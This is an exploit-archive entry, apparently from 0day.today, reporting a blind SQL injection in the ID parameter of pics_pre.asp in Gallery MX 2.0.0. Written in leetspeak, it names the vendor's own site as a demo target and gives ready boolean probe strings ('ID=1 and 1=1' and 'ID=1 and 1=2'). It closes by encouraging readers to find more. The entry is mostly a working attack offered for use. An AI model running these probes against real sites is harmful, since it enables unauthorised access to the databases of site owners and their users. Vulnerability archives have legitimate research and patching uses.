id: 4338
date: 12/03/2008
title: Gallery MX 2.0.0 (pics_pre.asp ID) Blind SQL Injection Vulnerability
author: R3d-D3v!L
cves: 

====================================================================
Gallery MX 2.0.0 (pics_pre.asp ID) Blind SQL Injection Vulnerability
====================================================================


 [~]Tybe:(pics_pre.asp ID) Blind SQL Injection Vulnerability
   
 [~]Vendor: www.mxmania.net/
   
 [~]Software: Gallery MX
   
 [~] Date: 28.11.2008
   
 [~] contact: N/A

[~] ----------------------------------------------------------
   

 [~]3xpL0!7 4 d3m0:

 http://gallery.mxmania.net/pics_pre.asp?ID={bL!ND}

   
 [~] 8L!/\/D:
   
  7Ru3 : pics_pre.asp?ID=1 and 1=1

  f4L53: pics_pre.asp?ID=1 and 1=2

   
N073:

! 7h!/\/k u can f!nd m0r3 

just let your m1nd breath ;)

[[~]--------------------------------------------------------------------------------------
 


#  0day.today [2023-03-22]  #